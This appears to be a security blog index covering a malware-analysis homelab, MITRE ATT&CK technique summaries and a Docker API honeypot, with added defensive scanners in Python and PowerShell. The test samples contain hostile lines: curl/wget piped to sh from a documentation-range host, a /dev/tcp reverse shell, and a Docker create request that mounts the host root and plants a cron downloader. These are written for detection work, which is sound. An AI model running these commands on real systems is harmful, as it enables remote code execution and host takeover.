Malware Analysis Homelab

This guide will serve as a lab for both static and dynamic malware analysis. The dynamic analysis portion will be in its own network that cannot reach out to the host network and vice versa.

I have to give credit to c3rb3ru5, because her guide is what taught me how to create networks within virtual machines and how to set up mitmproxy to capture traffic.

This lab was inspired by her KVM Malware Lab Guide, but I had to make some changes due to issues on my end. So I chose not to use a pfSense router (for now) and instead just use a NAT interface on the Ubuntu machine. I definitely recommend adding pfSense, though, to further secure the lab.

Read more →

Event Triggered Execution: Unix Shell Configuration Modification (T1546.004)

T1546.004

Adversaries may establish persistence by planting commands that a user's shell executes automatically. Unix shells run several configuration scripts at different points in a session, triggered by events. For example, when a user opens a terminal or logs in remotely (such as via SSH), a login shell is started; it executes scripts from the system directory (/etc) and from the user's home directory (~/) to configure the environment. Bourne-compatible login shells such as sh and bash read /etc/profile when initiated. These scripts run with the privileges of the user whose shell is starting (so a line added to /etc/profile runs for every user on the system, including root, though only root can write that file) and are typically used to set environment variables, create aliases, and customize the user's environment. When the shell exits, further scripts (such as ~/.bash_logout) run so that the session is torn down cleanly.

Read more →

Command and Scripting Interpreter: Unix Shell (T1059.004)

T1059.004

Adversaries may abuse Unix shells to execute various commands or payloads. Interactive shells may be accessed through command and control channels or during lateral movement such as with SSH. Adversaries may also leverage shell scripts to deliver and execute multiple commands on victims or as part of payloads used for persistence.
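The two summaries above (T1546.004 and T1059.004) share one practical check: the same command-line heuristics that flag a planted line in a shell start-up file also flag that command when a shell is spawned at run time. The block below is an added example, not code from the original page or from MITRE; the rc-file contents, the `ts|user|parent|cmdline` record format and the log records are all constructed for it, and the pattern list and the "service parent" list are assumptions you would tune to your environment. It also shows the detail that matters for T1546.004 persistence: a bash login shell reads only the first of ~/.bash_profile, ~/.bash_login and ~/.profile.

```python
"""Added example (not code from the original page or from MITRE).

One command classifier serves two technique summaries:
  * T1546.004: lines planted in shell start-up files gain persistence, so the
    classifier is run over each file's contents;
  * T1059.004: the same commands appear when a shell is spawned at run time,
    so it is also run over process-execution records.
All file contents, log records and the record format here are constructed."""
import os
import re
from typing import Dict, List, Set, Tuple

# Shell start-up files worth baselining (T1546.004); assumed list, extend per shell.
SHELL_CONFIG_FILES = [
    "/etc/profile", "/etc/bash.bashrc", "/etc/profile.d/*.sh",
    "~/.bash_profile", "~/.bash_login", "~/.profile", "~/.bashrc",
    "~/.bash_logout", "~/.zshenv", "~/.zprofile", "~/.zshrc", "~/.zlogout",
]

# Patterns rarely legitimate in an rc file or an ad-hoc command line (assumed set).
SUSPICIOUS_PATTERNS: List[Tuple[str, re.Pattern]] = [
    ("download-and-execute", re.compile(r"\b(curl|wget)\b[^|;]*\|\s*(ba|z|da)?sh\b")),
    ("base64-decoded-command", re.compile(r"base64\s+(-d|--decode)[^|]*\|\s*(ba|z|da)?sh\b")),
    ("reverse-shell-redirect", re.compile(r"/dev/tcp/\d{1,3}(\.\d{1,3}){3}/\d+")),
    ("backgrounded-hidden-binary", re.compile(r"/\.[^/\s]+.*\s&\s*$")),
    ("eval-of-variable", re.compile(r"\beval\b\s+[\"']?\$")),
]

SHELL_BINARIES: Set[str] = {"sh", "bash", "zsh", "dash", "ksh"}
# Parents that should essentially never spawn a shell; a web shell or C2
# implant living inside one of these does exactly that (assumed list).
SERVICE_PARENTS: Set[str] = {"nginx", "apache2", "httpd", "php-fpm", "java", "node"}


def bash_login_sources(existing: Set[str]) -> List[str]:
    """Files a bash login shell reads, given which user files exist: /etc/profile
    always, then only the FIRST of ~/.bash_profile, ~/.bash_login, ~/.profile.
    A line planted in ~/.profile never runs if ~/.bash_profile exists."""
    order = ["/etc/profile"]
    for candidate in ("~/.bash_profile", "~/.bash_login", "~/.profile"):
        if candidate in existing:
            order.append(candidate)
            break
    return order


def classify_command(cmd: str) -> List[str]:
    """Names of every suspicious pattern matching a shell command (may be empty)."""
    return [name for name, rx in SUSPICIOUS_PATTERNS if rx.search(cmd)]


def scan_shell_config(path: str, content: str) -> List[Dict[str, object]]:
    """Flag suspicious lines in one start-up file; comments and blanks are skipped."""
    findings = []
    for lineno, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        hits = classify_command(line)
        if hits:
            findings.append({"file": path, "line": lineno, "text": line, "hits": hits})
    return findings


def scan_exec_log(records: List[str]) -> List[Dict[str, object]]:
    """Flag shell executions in constructed 'ts|user|parent|cmdline' records:
    known-bad command patterns, plus any shell whose parent is a service."""
    findings = []
    for rec in records:
        ts, user, parent, cmd = rec.split("|", 3)
        hits = classify_command(cmd)
        if os.path.basename(cmd.split()[0]) in SHELL_BINARIES and parent in SERVICE_PARENTS:
            hits.append("shell-from-service-parent")
        if hits:
            findings.append({"ts": ts, "user": user, "parent": parent, "cmd": cmd, "hits": hits})
    return findings


# Constructed ~/.bashrc: two normal lines, then three planted ones.
CONSTRUCTED_BASHRC = """\
# ~/.bashrc (constructed sample)
export PATH="$HOME/bin:$PATH"
alias ll='ls -la'
curl -fsSL http://203.0.113.10/i.sh | bash
echo 'L2Jpbi9zaCAtaQ==' | base64 -d | sh
nohup /tmp/.cache/.x >/dev/null 2>&1 &
"""

# Constructed execution records (203.0.113.0/24 is a documentation range).
CONSTRUCTED_EXEC_LOG = [
    "2024-05-01T10:00:01Z|alice|sshd|bash -l",
    "2024-05-01T10:00:09Z|alice|bash|ls -la /var/log",
    "2024-05-01T10:02:13Z|www-data|php-fpm|sh -c 'bash -i >& /dev/tcp/203.0.113.10/4444 0>&1'",
    "2024-05-01T10:03:40Z|root|cron|/bin/sh -c 'wget -qO- http://203.0.113.10/x | sh'",
]

if __name__ == "__main__":
    for f in scan_shell_config("~/.bashrc", CONSTRUCTED_BASHRC) + scan_exec_log(CONSTRUCTED_EXEC_LOG):
        print(f)
```

Run against real hosts by feeding `scan_shell_config` the contents of each file in `SHELL_CONFIG_FILES` (for every home directory, not just your own) and `scan_exec_log` a dump of your execve telemetry reshaped into the four-field record. The parent check is deliberately separate from the pattern check: a shell under php-fpm is worth a look even when its command line is innocuous, because the interesting part of a web shell is usually in the request, not the first command.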

Read more →

Hide Artifacts: NTFS File Attributes (T1564.004)

T1564.004

Data or executables may be stored in New Technology File System (NTFS) partition metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus.

Adversaries may use NTFS file attributes to hide their malicious data in order to evade detection. Every New Technology File System (NTFS) formatted partition contains a Master File Table (MFT) that maintains a record for every file/directory on the partition. Within MFT entries are file attributes, such as Extended Attributes (EA) and Data [known as Alternate Data Streams (ADSs) when more than one Data attribute is present], that can be used to store arbitrary data (and even complete files).
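The following is an added example, not code from the original page: it creates a second `$DATA` attribute (an Alternate Data Stream) on a file, shows why ordinary directory listings miss it, and hunts for non-default streams across a directory tree. It assumes a Windows host with an NTFS volume and creates its demo file under `$env:TEMP`; the stream name `payload` and the function name `Find-AlternateDataStreams` are choices made here.

```powershell
# Added example (not from the original page): create, find and remove an NTFS
# Alternate Data Stream with PowerShell. Requires an NTFS volume; the demo file
# is created under $env:TEMP and removed at the end.

$file = Join-Path $env:TEMP 'ads-demo.txt'
Set-Content -Path $file -Value 'visible content'

# Attach a second $DATA attribute named "payload". Explorer, dir and
# Get-ChildItem show only the unnamed stream, so the file still looks tiny.
Set-Content -Path $file -Stream 'payload' -Value 'data hidden in an ADS'
(Get-Item $file).Length          # reports the size of the unnamed stream only

# Enumerate every stream on the file: ':$DATA' is the normal content,
# anything else is an ADS.
Get-Item -Path $file -Stream * | Select-Object FileName, Stream, Length

# Read the hidden stream back. The same file:stream syntax is what an
# adversary uses to stash a binary, e.g. file.txt:payload.exe
Get-Content -Path $file -Stream 'payload'

# Hunting: list non-default streams under a directory tree. Zone.Identifier is
# the mark-of-the-web that browsers add to downloads and is expected; anything
# else deserves a look. Run as a user with read access to the tree.
function Find-AlternateDataStreams {
    param([string]$Root)
    Get-ChildItem -Path $Root -Recurse -File -ErrorAction SilentlyContinue |
        ForEach-Object { Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue } |
        Where-Object { $_.Stream -ne ':$DATA' -and $_.Stream -ne 'Zone.Identifier' } |
        Select-Object FileName, Stream, Length
}
Find-AlternateDataStreams -Root $env:TEMP

# Remove the stream (or the whole file) once examined.
Remove-Item -Path $file -Stream 'payload'
Remove-Item -Path $file
```

From cmd.exe the equivalent listing is `dir /r`. For continuous detection rather than periodic hunting, Sysmon Event ID 15 (FileCreateStreamHash) records every named stream written to disk, including its hash, which is the signal to alert on.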

Read more →

Honeypot

https://sysdig.com/blog/triaging-malicious-docker-container/

https://www.intezer.com/blog/malware-analysis/how-to-make-malware-honeypot/

https://medium.com/@riccardo.ancarani94/attacking-docker-exposed-api-3e01ffc3c124

https://hub.docker.com/_/alpine

EC2 instance running Ubuntu Server 18.04 with Docker, hosting an Alpine Linux container.

  • Port 22 is locked to my IP only
  • Port 2375 is exposed, which is the Docker Engine API over plain TCP (no TLS, no authentication; 2376 is the TLS-protected variant). Useful for tools like Portainer.

Got an alert for a masscan command searching for port 2375. Another alert was triggered for 2376, as some APIs expose this instead of 2375.
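Once a scanner finds 2375 open, the next request is almost always `POST /containers/create` with a HostConfig that mounts the host filesystem or asks for a privileged container, which is how the Sysdig and Medium posts linked above describe the takeover. The block below is an added example, not code from the original post or from any of the linked articles: it audits captured create requests for those escape primitives. The HostConfig keys (`Binds`, `Privileged`, `PidMode`, `NetworkMode`, `CapAdd`) and the versioned `/vN.NN/containers/create` path are real Docker Engine API fields; the request bodies, the raw request, the sensitive-path list and the capability list are constructed or assumed here.

```python
"""Added example (not from the original post). With the Docker Engine API
reachable on TCP 2375 there is no authentication, so the follow-on to a
masscan hit is usually POST /containers/create with a HostConfig that mounts
the host filesystem or runs privileged. This audits captured create requests
for those escape primitives. HostConfig keys (Binds, Privileged, PidMode,
NetworkMode, CapAdd) and the /vN.NN/containers/create path are real API
fields; every request body and raw request below is constructed."""
import json
import re
from typing import Dict, List

# Host paths that, once bind-mounted, hand over the host or the Docker daemon
# (assumed list; extend for your environment).
SENSITIVE_HOST_PATHS = ("/", "/etc", "/root", "/home", "/proc", "/sys", "/boot",
                        "/var/run/docker.sock")
DANGEROUS_CAPS = {"ALL", "SYS_ADMIN", "SYS_PTRACE", "SYS_MODULE", "DAC_READ_SEARCH"}


def _is_sensitive(host_path: str) -> bool:
    path = host_path.rstrip("/") or "/"
    return path in SENSITIVE_HOST_PATHS or any(
        path.startswith(p + "/") for p in SENSITIVE_HOST_PATHS if p != "/")


def audit_create_request(body: Dict) -> List[str]:
    """Reasons a /containers/create body looks like a host takeover; [] if clean."""
    reasons: List[str] = []
    hc = body.get("HostConfig") or {}
    if hc.get("Privileged"):
        reasons.append("privileged container")
    if hc.get("PidMode") == "host":
        reasons.append("host PID namespace")
    if hc.get("NetworkMode") == "host":
        reasons.append("host network namespace")
    for cap in hc.get("CapAdd") or []:
        name = cap.upper()
        if name.startswith("CAP_"):
            name = name[4:]
        if name in DANGEROUS_CAPS:
            reasons.append(f"dangerous capability {cap}")
    mounted_host = False
    for bind in hc.get("Binds") or []:
        if _is_sensitive(bind.split(":", 1)[0]):
            reasons.append(f"host path mounted: {bind}")
            mounted_host = True
    cmd = " ".join(body.get("Cmd") or [])
    if mounted_host and re.search(r"\bchroot\b", cmd):
        reasons.append("chroot into bind-mounted host filesystem")
    return reasons


def audit_http_request(raw: str) -> List[str]:
    """Parse a captured HTTP request and audit it if it is a container-create
    call (with or without an API version prefix); other requests return []."""
    head, _, body = raw.partition("\r\n\r\n")
    method, target, _ = head.split("\r\n", 1)[0].split(" ", 2)
    path = target.split("?", 1)[0]
    if method != "POST" or not re.fullmatch(r"(/v\d+(\.\d+)?)?/containers/create", path):
        return []
    return audit_create_request(json.loads(body))


# Constructed bodies: a legitimate deployment, the classic "mount / into the
# container, chroot, add a cron job" takeover, and a docker.sock grab.
CONSTRUCTED_BENIGN_BODY = {
    "Image": "alpine", "Cmd": ["sleep", "3600"],
    "HostConfig": {"Binds": ["/srv/app-data:/data"]},
}
CONSTRUCTED_ATTACK_BODY = {
    "Image": "alpine",
    "Cmd": ["chroot", "/mnt", "sh", "-c",
            "echo '* * * * * root curl http://203.0.113.10/x | sh' >> /etc/crontab"],
    "HostConfig": {"Binds": ["/:/mnt"], "Privileged": True},
}
CONSTRUCTED_SOCKET_BODY = {
    "Image": "alpine", "Cmd": ["sh"],
    "HostConfig": {"Binds": ["/var/run/docker.sock:/var/run/docker.sock"]},
}
# Constructed raw request as a honeypot would capture it (198.51.100.7 and
# 203.0.113.10 are documentation addresses).
CONSTRUCTED_RAW_REQUEST = (
    "POST /v1.40/containers/create?name=sys HTTP/1.1\r\n"
    "Host: 198.51.100.7:2375\r\n"
    "Content-Type: application/json\r\n"
    "\r\n" + json.dumps(CONSTRUCTED_ATTACK_BODY)
)

if __name__ == "__main__":
    for label, body in [("benign", CONSTRUCTED_BENIGN_BODY), ("attack", CONSTRUCTED_ATTACK_BODY),
                        ("socket", CONSTRUCTED_SOCKET_BODY)]:
        print(label, audit_create_request(body))
    print("raw", audit_http_request(CONSTRUCTED_RAW_REQUEST))
```

The honeypot value is in the request bodies, so capture them (mitmproxy in front of the daemon, or a listener that speaks just enough HTTP) rather than only the port hits. For a real host rather than bait, the fix is the one the page already applies to port 22: restrict 2375 to known sources in the security group, or move the daemon to 2376 with TLS client certificates so that an open port no longer means an open daemon.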

Read more →